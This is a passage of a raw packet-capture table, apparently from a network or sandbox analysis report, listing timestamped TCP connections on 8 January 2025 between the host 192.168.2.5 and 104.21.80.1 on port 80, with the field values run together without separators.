              Jan 8, 2025 08:44:02.683666945 CET4970680192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:02.683716059 CET4970780192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:02.683852911 CET4970780192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:02.688591003 CET8049707104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:03.345909119 CET8049707104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:03.346004009 CET4970780192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:04.978604078 CET4970780192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:04.979123116 CET4970880192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:04.983735085 CET8049707104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:04.983799934 CET4970780192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:04.983985901 CET8049708104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:04.984059095 CET4970880192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:04.984251976 CET4970880192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:04.988960028 CET8049708104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:05.633984089 CET8049708104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:05.634067059 CET4970880192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:07.153757095 CET4970880192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:07.154088020 CET4970980192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:07.158991098 CET8049708104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:07.159009933 CET8049709104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:07.159060955 CET4970880192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:07.159100056 CET4970980192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:07.159228086 CET4970980192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:07.164002895 CET8049709104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:07.822917938 CET8049709104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:07.822983027 CET4970980192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:09.446326017 CET4970980192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:09.446604013 CET4971080192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:09.451474905 CET8049709104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:09.451492071 CET8049710104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:09.451560020 CET4970980192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:09.451618910 CET4971080192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:09.451776028 CET4971080192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:09.456619978 CET8049710104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:10.073746920 CET8049710104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:10.073810101 CET4971080192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:11.584671021 CET4971080192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:11.585035086 CET4971180192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:11.589823961 CET8049710104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:11.589931011 CET8049711104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:11.589951992 CET4971080192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:11.590074062 CET4971180192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:11.590373993 CET4971180192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:11.595130920 CET8049711104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:12.233028889 CET8049711104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:12.233089924 CET4971180192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:14.069073915 CET4971180192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:14.069524050 CET4971680192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:14.074184895 CET8049711104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:14.074254036 CET4971180192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:14.074299097 CET8049716104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:14.074358940 CET4971680192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:14.074604988 CET4971680192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:14.079339027 CET8049716104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:14.698978901 CET8049716104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:14.699040890 CET4971680192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:16.212290049 CET4971980192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:16.212290049 CET4971680192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:16.217138052 CET8049719104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:16.217210054 CET4971980192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:16.217257977 CET8049716104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:16.217314005 CET4971680192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:16.217458963 CET4971980192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:16.222254038 CET8049719104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:16.848417997 CET8049719104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:16.848475933 CET4971980192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:18.475176096 CET4971980192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:18.475442886 CET4973380192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:18.480252028 CET8049719104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:18.480268955 CET8049733104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:18.480325937 CET4971980192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:18.480359077 CET4973380192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:18.480537891 CET4973380192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:18.486418962 CET8049733104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:19.118756056 CET8049733104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:19.120320082 CET4973380192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:20.631581068 CET4973380192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:20.631838083 CET4974980192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:20.636672020 CET8049733104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:20.636687994 CET8049749104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:20.636740923 CET4973380192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:20.636770964 CET4974980192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:20.636873007 CET4974980192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:20.641619921 CET8049749104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:21.200469017 CET8049749104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:21.200531960 CET4974980192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:22.820776939 CET4974980192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:22.821150064 CET4976580192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:22.825809002 CET8049749104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:22.825867891 CET4974980192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:22.825910091 CET8049765104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:22.825972080 CET4976580192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:22.826100111 CET4976580192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:22.830816984 CET8049765104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:23.472223997 CET8049765104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:23.472296000 CET4976580192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:24.975514889 CET4976580192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:24.975953102 CET4977680192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:24.980531931 CET8049765104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:24.980586052 CET4976580192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:24.980767012 CET8049776104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:24.980825901 CET4977680192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:24.981040001 CET4977680192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:24.985789061 CET8049776104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:25.612215996 CET8049776104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:25.612292051 CET4977680192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:27.240850925 CET4977680192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:27.241257906 CET4979280192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:27.246860981 CET8049776104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:27.246922016 CET4977680192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:27.247030020 CET8049792104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:27.247190952 CET4979280192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:27.247229099 CET4979280192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:27.253026962 CET8049792104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:27.885174990 CET8049792104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:27.885377884 CET4979280192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:29.397129059 CET4979280192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:29.397387981 CET4980780192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:29.402169943 CET8049792104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:29.402226925 CET8049807104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:29.402259111 CET4979280192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:29.402311087 CET4980780192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:29.402479887 CET4980780192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:29.407326937 CET8049807104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:29.978251934 CET8049807104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:29.978313923 CET4980780192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:31.600467920 CET4980780192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:31.600784063 CET4982380192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:31.605479956 CET8049807104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:31.605537891 CET4980780192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:31.605597973 CET8049823104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:31.605669975 CET4982380192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:31.605812073 CET4982380192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:31.612489939 CET8049823104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:32.261640072 CET8049823104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:32.261847973 CET4982380192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:33.772268057 CET4982380192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:33.772589922 CET4983980192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:33.777461052 CET8049839104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:33.777477980 CET8049823104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:33.777575970 CET4982380192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:33.777595043 CET4983980192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:33.777914047 CET4983980192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:33.782676935 CET8049839104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:34.421993017 CET8049839104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:34.422058105 CET4983980192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:36.055712938 CET4983980192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:36.056016922 CET4985580192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:36.060766935 CET8049839104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:36.060827017 CET4983980192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:36.060836077 CET8049855104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:36.060905933 CET4985580192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:36.061043024 CET4985580192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:36.065839052 CET8049855104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:36.707886934 CET8049855104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:36.707967043 CET4985580192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:38.209544897 CET4985580192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:38.209769964 CET4987180192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:38.214519024 CET8049871104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:38.214675903 CET8049855104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:38.214752913 CET4985580192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:38.214849949 CET4987180192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:38.214849949 CET4987180192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:38.219640017 CET8049871104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:38.879929066 CET8049871104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:38.880352974 CET4987180192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:40.506433010 CET4987180192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:40.506715059 CET4988680192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:40.511466980 CET8049871104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:40.511508942 CET8049886104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:40.511538982 CET4987180192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:40.511583090 CET4988680192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:40.511753082 CET4988680192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:40.516598940 CET8049886104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:41.142518044 CET8049886104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:41.142580032 CET4988680192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:42.685101986 CET4988680192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:42.688987970 CET4989680192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:42.846530914 CET8049896104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:42.846580982 CET8049886104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:42.846611977 CET4989680192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:42.846641064 CET4988680192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:42.871694088 CET4989680192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:42.876580000 CET8049896104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:43.501418114 CET8049896104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:43.501468897 CET4989680192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:45.133403063 CET4989680192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:45.133666039 CET4991480192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:45.138350964 CET8049896104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:45.138430119 CET4989680192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:45.138493061 CET8049914104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:45.138593912 CET4991480192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:45.138725042 CET4991480192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:45.143487930 CET8049914104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:45.766542912 CET8049914104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:45.768373013 CET4991480192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:47.475209951 CET4991480192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:47.475552082 CET4992680192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:47.483134985 CET8049926104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:47.484379053 CET4992680192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:47.484566927 CET4992680192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:47.489098072 CET8049914104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:47.489306927 CET8049926104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:47.489365101 CET4991480192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:48.129406929 CET8049926104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:48.129497051 CET4992680192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:49.756422997 CET4992680192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:49.756705999 CET4994280192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:49.761447906 CET8049926104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:49.761475086 CET8049942104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:49.761528969 CET4992680192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:49.761578083 CET4994280192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:49.761737108 CET4994280192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:49.766483068 CET8049942104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:50.406974077 CET8049942104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:50.408377886 CET4994280192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:51.913547993 CET4994280192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:51.914239883 CET4995980192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:51.918584108 CET8049942104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:51.918643951 CET4994280192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:51.919080019 CET8049959104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:51.919152021 CET4995980192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:51.924940109 CET4995980192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:51.929702044 CET8049959104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:52.579974890 CET8049959104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:52.580034018 CET4995980192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:54.213736057 CET4995980192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:54.214011908 CET4997580192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:54.218835115 CET8049959104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:54.218877077 CET8049975104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:54.218905926 CET4995980192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:54.218949080 CET4997580192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:54.219134092 CET4997580192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:54.223954916 CET8049975104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:54.864738941 CET8049975104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:54.867331982 CET4997580192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:56.399843931 CET4997580192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:56.400126934 CET4999080192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:56.405023098 CET8049990104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:56.405038118 CET8049975104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:56.405077934 CET4999080192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:56.405103922 CET4997580192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:56.405364037 CET4999080192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:56.410078049 CET8049990104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:57.035424948 CET8049990104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:57.035506964 CET4999080192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:58.664529085 CET4999080192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:58.664796114 CET5000380192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:58.669548988 CET8049990104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:58.669581890 CET8050003104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:58.669642925 CET4999080192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:58.669678926 CET5000380192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:58.669764042 CET5000380192.168.2.5104.21.80.1
              Jan 8, 2025 08:44:58.674551010 CET8050003104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:59.313751936 CET8050003104.21.80.1192.168.2.5
              Jan 8, 2025 08:44:59.313925982 CET5000380192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:00.819024086 CET5000380192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:00.819355011 CET5000480192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:00.824182987 CET8050004104.21.80.1192.168.2.5
              Jan 8, 2025 08:45:00.824244022 CET5000480192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:00.824453115 CET5000480192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:00.824506998 CET8050003104.21.80.1192.168.2.5
              Jan 8, 2025 08:45:00.824568987 CET5000380192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:00.829210997 CET8050004104.21.80.1192.168.2.5
              Jan 8, 2025 08:45:01.557617903 CET8050004104.21.80.1192.168.2.5
              Jan 8, 2025 08:45:01.557818890 CET5000480192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:03.180543900 CET5000480192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:03.180931091 CET5000580192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:03.185563087 CET8050004104.21.80.1192.168.2.5
              Jan 8, 2025 08:45:03.185646057 CET5000480192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:03.185816050 CET8050005104.21.80.1192.168.2.5
              Jan 8, 2025 08:45:03.185899973 CET5000580192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:03.186043024 CET5000580192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:03.190758944 CET8050005104.21.80.1192.168.2.5
              Jan 8, 2025 08:45:03.832396030 CET8050005104.21.80.1192.168.2.5
              Jan 8, 2025 08:45:03.832465887 CET5000580192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:05.336333990 CET5000580192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:05.336582899 CET5000680192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:05.341502905 CET8050005104.21.80.1192.168.2.5
              Jan 8, 2025 08:45:05.341521025 CET8050006104.21.80.1192.168.2.5
              Jan 8, 2025 08:45:05.341566086 CET5000580192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:05.341598988 CET5000680192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:05.341713905 CET5000680192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:05.346604109 CET8050006104.21.80.1192.168.2.5
              Jan 8, 2025 08:45:05.896019936 CET8050006104.21.80.1192.168.2.5
              Jan 8, 2025 08:45:05.896205902 CET5000680192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:06.023324013 CET8050006104.21.80.1192.168.2.5
              Jan 8, 2025 08:45:06.023488045 CET5000680192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:07.649108887 CET5000680192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:07.649403095 CET5000780192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:07.654119015 CET8050006104.21.80.1192.168.2.5
              Jan 8, 2025 08:45:07.654191017 CET5000680192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:07.654217958 CET8050007104.21.80.1192.168.2.5
              Jan 8, 2025 08:45:07.654290915 CET5000780192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:07.654402971 CET5000780192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:07.659195900 CET8050007104.21.80.1192.168.2.5
              Jan 8, 2025 08:45:08.286063910 CET8050007104.21.80.1192.168.2.5
              Jan 8, 2025 08:45:08.286125898 CET5000780192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:09.789772034 CET5000780192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:09.790096045 CET5000880192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:09.794910908 CET8050007104.21.80.1192.168.2.5
              Jan 8, 2025 08:45:09.794936895 CET8050008104.21.80.1192.168.2.5
              Jan 8, 2025 08:45:09.794982910 CET5000780192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:09.795054913 CET5000880192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:09.795150995 CET5000880192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:09.799931049 CET8050008104.21.80.1192.168.2.5
              Jan 8, 2025 08:45:10.456854105 CET8050008104.21.80.1192.168.2.5
              Jan 8, 2025 08:45:10.456944942 CET5000880192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:12.086324930 CET5000880192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:12.086611986 CET5000980192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:12.091506004 CET8050008104.21.80.1192.168.2.5
              Jan 8, 2025 08:45:12.091521025 CET8050009104.21.80.1192.168.2.5
              Jan 8, 2025 08:45:12.091583014 CET5000880192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:12.091623068 CET5000980192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:12.091746092 CET5000980192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:12.096466064 CET8050009104.21.80.1192.168.2.5
              Jan 8, 2025 08:45:12.721060038 CET8050009104.21.80.1192.168.2.5
              Jan 8, 2025 08:45:12.721153975 CET5000980192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:14.227251053 CET5000980192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:14.227627993 CET5001080192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:14.232212067 CET8050009104.21.80.1192.168.2.5
              Jan 8, 2025 08:45:14.232275009 CET5000980192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:14.232400894 CET8050010104.21.80.1192.168.2.5
              Jan 8, 2025 08:45:14.232481003 CET5001080192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:14.232621908 CET5001080192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:14.237379074 CET8050010104.21.80.1192.168.2.5
              Jan 8, 2025 08:45:14.884509087 CET8050010104.21.80.1192.168.2.5
              Jan 8, 2025 08:45:14.884577036 CET5001080192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:16.508702993 CET5001080192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:16.508985996 CET5001180192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:16.513691902 CET8050010104.21.80.1192.168.2.5
              Jan 8, 2025 08:45:16.513761044 CET5001080192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:16.513808966 CET8050011104.21.80.1192.168.2.5
              Jan 8, 2025 08:45:16.513885021 CET5001180192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:16.514049053 CET5001180192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:16.518827915 CET8050011104.21.80.1192.168.2.5
              Jan 8, 2025 08:45:17.157099009 CET8050011104.21.80.1192.168.2.5
              Jan 8, 2025 08:45:17.157154083 CET5001180192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:18.664411068 CET5001180192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:18.664828062 CET5001280192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:18.669430971 CET8050011104.21.80.1192.168.2.5
              Jan 8, 2025 08:45:18.669509888 CET5001180192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:18.669715881 CET8050012104.21.80.1192.168.2.5
              Jan 8, 2025 08:45:18.669815063 CET5001280192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:18.669969082 CET5001280192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:18.674802065 CET8050012104.21.80.1192.168.2.5
              Jan 8, 2025 08:45:19.300968885 CET8050012104.21.80.1192.168.2.5
              Jan 8, 2025 08:45:19.301110029 CET5001280192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:20.931070089 CET5001280192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:20.931546926 CET5001380192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:20.936077118 CET8050012104.21.80.1192.168.2.5
              Jan 8, 2025 08:45:20.936139107 CET5001280192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:20.936438084 CET8050013104.21.80.1192.168.2.5
              Jan 8, 2025 08:45:20.936505079 CET5001380192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:20.936687946 CET5001380192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:20.941503048 CET8050013104.21.80.1192.168.2.5
              Jan 8, 2025 08:45:21.567949057 CET8050013104.21.80.1192.168.2.5
              Jan 8, 2025 08:45:21.568047047 CET5001380192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:23.071652889 CET5001380192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:23.072033882 CET5001480192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:23.077905893 CET8050013104.21.80.1192.168.2.5
              Jan 8, 2025 08:45:23.077965975 CET5001380192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:23.078234911 CET8050014104.21.80.1192.168.2.5
              Jan 8, 2025 08:45:23.078318119 CET5001480192.168.2.5104.21.80.1
              Jan 8, 2025 08:45:23.078464985 CET5001480192.168.2.5104.21.80.1
